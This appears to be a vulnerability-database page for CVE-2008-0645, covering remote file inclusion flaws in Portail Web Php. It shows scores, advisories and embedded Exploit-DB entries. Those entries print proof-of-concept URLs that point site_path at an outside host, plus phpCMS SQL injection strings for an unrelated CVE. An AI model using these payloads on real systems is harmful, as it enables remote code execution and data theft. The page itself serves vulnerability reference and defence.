CVE-2008-0645
published 2008-02-07CVE-2008-0645: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
34.27%
98.2th percentile
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/; and (4) system/login.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| portail_web_php | portail_web_php | <= 2.5.1.1 | — |
| portail_web_php | portail_web_php | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fwpq-7jcm-8q4c: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
ghsa_unreviewed·2022-05-01
CVE-2008-0645 [HIGH] CWE-94 GHSA-fwpq-7jcm-8q4c: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/; and (4) system/login.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
GHSA
GHSA-w6pv-f5jc-pvqc: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-1068 [HIGH] CWE-94 GHSA-w6pv-f5jc-pvqc: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) Vert/index.php, (2) Noir/index.php, and (3) Bleu/index.php in template/, different vectors than CVE-2008-0645.
No detection rules found.
Exploit-DB
phpCMS 2008 - SQL Injection
exploitdb·2011-01-20
CVE-2011-0645 phpCMS 2008 - SQL Injection
phpCMS 2008 - SQL Injection
---
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^]� Xp10_hAcKEr
[?]
# REMOTE SQL iNJECTioN Vulnerabilities
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] prove of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already Tested on Win Xp
[~]-----------------------
Exploit-DB
phpCMS 2008 V2 - 'data.php' SQL Injection
exploitdb·2011-01-17
CVE-2011-0645 phpCMS 2008 V2 - 'data.php' SQL Injection
phpCMS 2008 V2 - 'data.php' SQL Injection
---
source: https://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--
Exploit-DB
Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/modules/conf_modules.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/config/conf-activation.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/system/login.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/menu/item.php?site_path=http://www.example2.com
No writeups or analysis indexed.
2008-02-07
Published